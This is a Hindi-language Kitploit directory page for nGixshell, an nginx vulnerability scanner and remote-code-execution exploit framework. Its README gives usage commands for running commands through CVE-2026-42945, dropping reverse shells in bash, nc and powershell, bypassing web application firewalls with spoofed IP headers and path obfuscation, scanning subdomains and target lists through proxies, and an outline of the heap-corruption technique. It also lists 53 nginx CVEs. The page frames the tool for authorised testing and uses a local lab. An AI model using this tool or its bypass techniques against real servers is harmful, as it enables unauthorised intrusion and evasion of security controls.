Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
nGixshell — nginx CVE स्कैनर + RCE शोषण ढाँचा (CVE-2026-42945 + 16 अन्य) | Kitploit
उपकरण/GitHubGitHub/mateusverass/ngixshell
टोहीभेद्यता स्कैनरशोषण फ्रेमवर्कवेब एप्लिकेशन शोषणWAF बाईपासवेब सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलसबडोमेन एनुमरेशनरेड टीमिंगपेलोड डेवलपमेंट
21863 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
mateusverass/ngixshell

nGixshell

nginx CVE स्कैनर + RCE शोषण ढाँचा (CVE-2026-42945 + 16 अन्य)

रिपॉजिटरी देखें
nGixShell

Python CVEs Zero deps License


nGixShell एक nginx CVE स्कैनर और RCE एक्सप्लॉइट फ्रेमवर्क है। इसमें CVE-2026-42945 — ngx_http_rewrite_module में एक गंभीर हीप बफर ओवरफ़्लो — का एक कार्यशील प्रूफ-ऑफ-कॉन्सेप्ट और 53 nginx CVEs को कवर करने वाला एक स्कैनर शामिल है, जिसमें स्वचालित HTTP प्रोब, फिंगरप्रिंटिंग, WAF डिटेक्शन/बायपास, वेब सुरक्षा ऑडिटिंग और रिपोर्ट जनरेशन शामिल है।

शून्य बाहरी निर्भरताएँ। शुद्ध Python 3 stdlib।


त्वरित आरंभ

root@kitploit:~
# असुरक्षित लैब शुरू करें
docker compose -f env/docker-compose.yml up -d

# ऑटो मोड — फिंगरप्रिंट + CVE स्कैन + वेब ऑडिट
python3 ngixshell.py 127.0.0.1:19321

# RCE के माध्यम से कमांड निष्पादित करें (CVE-2026-42945)
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id'

# रिवर्स शेल ड्रॉप करें (IP स्वचालित रूप से पहचाना जाता है)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# WAF का पता लगाएँ और बायपास करें, फिर स्कैन करें
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# सबडोमेन स्कैन
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# फ़ाइल से एकाधिक लक्ष्य
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

किसी फ़्लैग की आवश्यकता नहीं — टूल को किसी लक्ष्य पर इंगित करने पर सब कुछ स्वचालित रूप से चलता है।
TLS स्वचालित रूप से पता चलता है। nginx server_tokens off होने पर भी फिंगरप्रिंट किया जाता है।


उपयोग

root@kitploit:~
python3 ngixshell.py [TARGET] [OPTIONS]

TARGET प्रारूप:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

मोड

WAF डिटेक्शन और बायपास

फ़्लैगविवरण
--waf-detectस्कैन करने से पहले WAF का पता लगाएँ
--waf-bypassसभी बायपास तकनीकों को सक्षम करें (डिटेक्शन भी चलता है)
--waf-ip IPबायपास हेडर में इस IP को स्पूफ करें (डिफ़ॉल्ट: यादृच्छिक RFC1918)

बायपास तकनीकें (सभी सक्रिय जब --waf-bypass सेट हो):

पता लगाए गए WAF: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

वेब ऑडिट

स्कैन मोड में स्वचालित रूप से चलता है। सभी मॉड्यूल को व्यक्तिगत रूप से छोड़ा जा सकता है।

  • हेडर ऑडिट — HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, संस्करण-लीक करने वाले हेडर
  • पथ खोज — 50+ पथ; सेंटिनल प्रोब कैच-ऑल 403/301 नियमों से झूठी सकारात्मकता को समाप्त करता है
  • वर्चुअल होस्ट गणना — डिफ़ॉल्ट-ब्लॉक झूठी सकारात्मकता से बचने के लिए स्थिति और बॉडी दोनों में अंतर की आवश्यकता है
  • TLS ऑडिट — TLS 1.0–1.3 समर्थन, प्रमाणपत्र समाप्ति और स्व-हस्ताक्षरित पहचान का परीक्षण करता है
  • stub_status — यदि उजागर हो तो /nginx_status से सक्रिय कनेक्शन मीट्रिक पार्स करता है

कनेक्शन

फ़्लैगविवरण
--port PORTपोर्ट ओवरराइड करें
--tls

HTTP

फ़्लैगविवरण
--user-agent UAकस्टम User-Agent
--auth USER:PASSHTTP बेसिक प्रमाणीकरण

दर / समय

फ़्लैगविवरण
--rate-limit RPSअधिकतम अनुरोध प्रति सेकंड
--jitter MS

आउटपुट

फ़्लैगविवरण
--output FILE

CVE कवरेज

2009–2026 तक की 53 प्रविष्टियाँ। CVSS द्वारा क्रमबद्ध।


बग (CVE-2026-42945)

nginx की रीराइट स्क्रिप्ट इंजन दो-पास मॉडल का उपयोग करता है: बफर आकार की गणना करें, फिर कॉपी करें। is_args फ़्लैग मुख्य इंजन पर सेट होता है जब rewrite प्रतिस्थापन में ? होता है, लेकिन लंबाई-गणना पास ताज़ा शून्य किए गए उप-इंजन पर चलता है:

  • लंबाई पास — is_args = 0 देखता है → कच्ची कैप्चर लंबाई लौटाता है
  • कॉपी पास — is_args = 1 देखता है → ngx_escape_uri(NGX_ESCAPE_ARGS) को कॉल करता है, प्रत्येक असुरक्षित बाइट को 3 बाइट्स में विस्तारित करता है

कॉपी हमलावर-नियंत्रित URI डेटा के साथ अंडरसाइज़्ड हीप बफर को ओवरफ़्लो करती है। शोषण क्रॉस-अनुरोध हीप फेंग शुई के माध्यम से एक आसन्न ngx_pool_t क्लीनअप पॉइंटर को दूषित करता है, इसे एक नकली ngx_pool_cleanup_s पर रीडायरेक्ट करता है जो पूल विनाश पर system() को कॉल करता है।

प्रभावित संस्करण

उत्पादअसुरक्षितसुरक्षित
NGINX ओपन सोर्स0.6.27 – 1.30.01.31.0, 1.30.1
NGINX प्लसR32 – R36R36 P4, R35 P2, R32 P6

विक्रेता सलाह: https://my.f5.com/manage/s/article/K000160932


लैब सेटअप

Ubuntu 24.04 LTS पर परीक्षण किया गया। Docker और Python 3.8+ की आवश्यकता है।

root@kitploit:~
# असुरक्षित लैब शुरू करें (nginx 1.25.3)
docker compose -f env/docker-compose.yml up -d

# पूर्ण स्कैन
python3 ngixshell.py 127.0.0.1:19321

# JSON आउटपुट के साथ RCE
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id' --json

# रिवर्स शेल — bash पेलोड, PTY स्वचालित अपग्रेड
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# WAF बायपास स्कैन स्पूफ़ किए गए IP के साथ
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass --waf-ip 10.10.10.1

# SOCKS5 प्रॉक्सी के माध्यम से
python3 ngixshell.py 192.168.1.10 --proxy socks5://127.0.0.1:9050

# दर सीमा के साथ सबडोमेन स्कैन
python3 ngixshell.py --subdomain-scan example.com --scan-port 443 --rate-limit 10

# एकाधिक लक्ष्य, JSON आउटपुट, HTML रिपोर्ट
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण, CTF प्रतियोगिताओं और अनुसंधान के लिए।

टूल डाउनलोड करें
फ़्लैगविवरण
(कोई नहीं)ऑटो — फिंगरप्रिंट + CVE स्कैन + वेब ऑडिट
--cmd 'CMD'CVE-2026-42945 RCE के माध्यम से कमांड निष्पादित करें
--cmd-file FILEफ़ाइल से कमांड निष्पादित करें (; से जुड़े हुए)
--shellरिवर्स शेल ड्रॉप करें
--shell-type TYPEपेलोड: bash python perl php nc powershell (डिफ़ॉल्ट: python)
--upgrade-shellशेल कनेक्ट होने के बाद स्वचालित रूप से PTY अपग्रेड भेजें
--subdomain-scan DOMAINसबडोमेन पर असुरक्षित nginx खोजें
--cve CVE-IDएक विशिष्ट CVE का परीक्षण करें
--list-cvesसभी 53 CVEs को CVSS और प्रोब जानकारी के साथ प्रिंट करें
--list-candidatesहीप एड्रेस उम्मीदवार प्रिंट करें
--dry-runकेवल फिंगरप्रिंट + स्कैन, कोई एक्सप्लॉइट नहीं
--target-file FILEफ़ाइल से एकाधिक होस्ट स्कैन करें
तकनीकविवरण
IP स्पूफिंगX-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
UA रोटेशन11 वास्तविक ब्राउज़र/बॉट User-Agent, प्रति अनुरोध यादृच्छिक
पथ अस्पष्टताडबल-स्लैश, /./ पैडिंग, प्रतिशत-एन्कोडिंग, केस वेरिएशन
हेडर केस शफ़लWAF पैटर्न मैचिंग को तोड़ने के लिए हेडर नाम के केस को यादृच्छिक करता है
फ़्लैगविवरण
--skip-headersHTTP सुरक्षा हेडर ऑडिट छोड़ें
--skip-pathsपथ/फ़ाइल खोज छोड़ें
--skip-vhostsवर्चुअल होस्ट गणना छोड़ें
--skip-tlsTLS प्रोटोकॉल ऑडिट छोड़ें
--path-wordlist FILEजांचने के लिए अतिरिक्त पथ (प्रति पंक्ति एक)
TLS बलपूर्वक (डिफ़ॉल्ट रूप से स्वचालित रूप से पता चलता है)
--proxy URLप्रॉक्सी: http://, https://, socks5://
--cookie VALUE
Cookie हेडर
--header NAME:VALUEअतिरिक्त हेडर (दोहराया जा सकता है)
अनुरोधों के बीच 0–MS ms का यादृच्छिक विलंब
--retry Nअनिर्णायक प्रोब को पुनः प्रयास करें (डिफ़ॉल्ट: 1)
--timeout-multiplier Xसभी टाइमआउट को स्केल करें (डिफ़ॉल्ट: 1.0)
लॉग को FILE में लिखें
--jsonअंत में JSON सारांश प्रिंट करें
--html-report [FILE]HTML रिपोर्ट जनरेट करें (डिफ़ॉल्ट: ngixshell_<host>_<ts>.html)
--verboseडीबग आउटपुट
CVECVSSघटकविवरण
CVE-2026-429459.8 CRITICALrewriteहीप ओवरफ़्लो → RCE (exploited)
CVE-2026-429468.1 HIGHrewriteमेमोरी करप्शन (एक ही सलाह)
CVE-2022-417417.8 HIGHmp4दुर्भावनापूर्ण mp4 के माध्यम से मेमोरी करप्शन
CVE-2016-12477.8 HIGHपैकेजिंगलॉग फ़ाइल सिमलिंक विशेषाधिकार वृद्धि
CVE-2021-230177.7 HIGHरिज़ॉल्वरऑफ-बाय-वन हीप ओवरराइट
CVE-2026-407017.5 HIGHअनुरोधअनुरोध प्रसंस्करण में मेमोरी करप्शन
CVE-2026-429347.5 HIGHअनुरोधमेमोरी करप्शन (एक ही सलाह)
CVE-2026-277847.5 HIGHmp4क्राफ्टेड mp4 के माध्यम से बफर ओवरफ़्लो
CVE-2026-326477.5 HIGHmp4बफर ओवरफ़्लो (ऊपर का सहोदर)
CVE-2024-249907.5 HIGHHTTP/3QUIC मॉड्यूल में उपयोग-के-बाद-मुक्त
CVE-2024-249897.5 HIGHHTTP/3QUIC में NULL पॉइंटर डीरेफरेंस
CVE-2024-310797.5 HIGHHTTP/3QUIC एनकोडर में स्टैक ओवरफ़्लो
CVE-2024-327607.5 HIGHHTTP/3HEADERS फ्रेम के माध्यम से बफर ओवरराइट
CVE-2022-417427.5 HIGHmp4हीप मेमोरी प्रकटीकरण
CVE-2017-75297.5 HIGHरेंज फ़िल्टरपूर्णांक ओवरफ़्लो → सीमा-से-बाहर पढ़ना
CVE-2016-07467.5 HIGHरिज़ॉल्वरक्राफ्टेड DNS प्रतिक्रिया के माध्यम से उपयोग-के-बाद-मुक्त
CVE-2014-01337.5 HIGHSPDYSPDY कार्यान्वयन में हीप ओवरफ़्लो
CVE-2014-00887.5 HIGHSPDYSPDY में मेमोरी करप्शन
CVE-2013-45477.5 HIGHकोरSpace+NUL URI बायपास
CVE-2013-20287.5 HIGHकोरचंक्ड एन्कोडिंग स्टैक ओवरफ़्लो
CVE-2012-11807.5 HIGHप्रॉक्सीप्रॉक्सी मॉड्यूल में उपयोग-के-बाद-मुक्त
CVE-2009-35557.5 HIGHSSLTLS पुनर्वार्ता इंजेक्शन (MITM)
CVE-2009-26297.5 HIGHकोरURI पार्सिंग में बफर अंडरफ़्लो
CVE-2026-429266.5 MEDIUMHTTP/2प्रॉक्सी के माध्यम से अनुरोध विभाजन
CVE-2026-276546.5 MEDIUMWebDAVDAV मॉड्यूल में हीप ओवरफ़्लो
CVE-2026-287536.5 MEDIUMमेलमेल प्रॉक्सी में हेडर इंजेक्शन
CVE-2026-16426.5 MEDIUMप्रॉक्सीSSL अपस्ट्रीम सत्र पुन: उपयोग लीक
CVE-2019-95116.5 MEDIUMHTTP/2डेटा ड्रिबल CPU/मेमोरी DoS
CVE-2012-20896.8 MEDIUMmp4mp4 अनुरोध के माध्यम से बफर ओवरफ़्लो
CVE-2018-168455.5 MEDIUMmp4पूर्णांक अंडरफ़्लो → क्रैश + प्रकटीकरण
CVE-2019-203725.3 MEDIUMप्रॉक्सीHTTP अनुरोध तस्करी
CVE-2026-404605.3 MEDIUMHTTP/3QUIC कनेक्शन स्पूफिंग
CVE-2026-287555.3 MEDIUMSSLOCSP प्रसंस्करण में मेमोरी प्रकटीकरण
CVE-2025-234195.3 MEDIUMSSLTLS सत्र पुन: शुरू प्रमाणपत्र बायपास
CVE-2024-352005.3 MEDIUMHTTP/3NULL पॉइंटर डीरेफरेंस
CVE-2024-341615.3 MEDIUMHTTP/3मेमोरी प्रकटीकरण
CVE-2016-44505.3 MEDIUMकोरचंक्ड अनुरोध बॉडी के माध्यम से NULL पॉइंटर
CVE-2016-07425.0 MEDIUMरिज़ॉल्वरक्राफ्टेड UDP पैकेट के माध्यम से अमान्य पॉइंटर
CVE-2016-07475.0 MEDIUMरिज़ॉल्वरअपर्याप्त CNAME रिज़ॉल्यूशन सीमा
CVE-2014-35565.0 MEDIUMमेलSTARTTLS कमांड इंजेक्शन
CVE-2013-20705.3 MEDIUMप्रॉक्सीबैकएंड प्रतिक्रिया प्रकटीकरण
CVE-2011-49635.0 MEDIUMएक्सेसIPv6 लिटरल एक्सेस नियंत्रण बायपास
CVE-2011-43155.0 MEDIUMरिज़ॉल्वरक्राफ्टेड DNS प्रतिक्रिया के माध्यम से हीप ओवरफ़्लो
CVE-2009-38965.0 MEDIUMकोरNULL पॉइंटर डीरेफरेंस DoS
CVE-2025-538594.3 MEDIUMमेलSMTP कमांड इंजेक्शन
CVE-2014-36164.3 MEDIUMSSLTLS SNI वर्चुअल होस्ट भ्रम
CVE-2026-276514.3 MEDIUMमेलमेल प्रॉक्सी में NULL पॉइंटर डीरेफरेंस
CVE-2019-95134.3 MEDIUMHTTP/2रिसोर्स लूप CPU DoS
CVE-2019-95164.3 MEDIUMHTTP/20-लेंथ हेडर मेमोरी थकावट
CVE-2018-168434.3 MEDIUMHTTP/2अत्यधिक मेमोरी खपत
CVE-2018-168444.3 MEDIUMHTTP/2SETTINGS फ्रेम के माध्यम से अत्यधिक CPU
CVE-2024-73474.7 MEDIUMmp4सीमा-से-बाहर पढ़ना
CVE-2009-38984.9 MEDIUMWebDAVCOPY/MOVE के माध्यम से निर्देशिका ट्रैवर्सल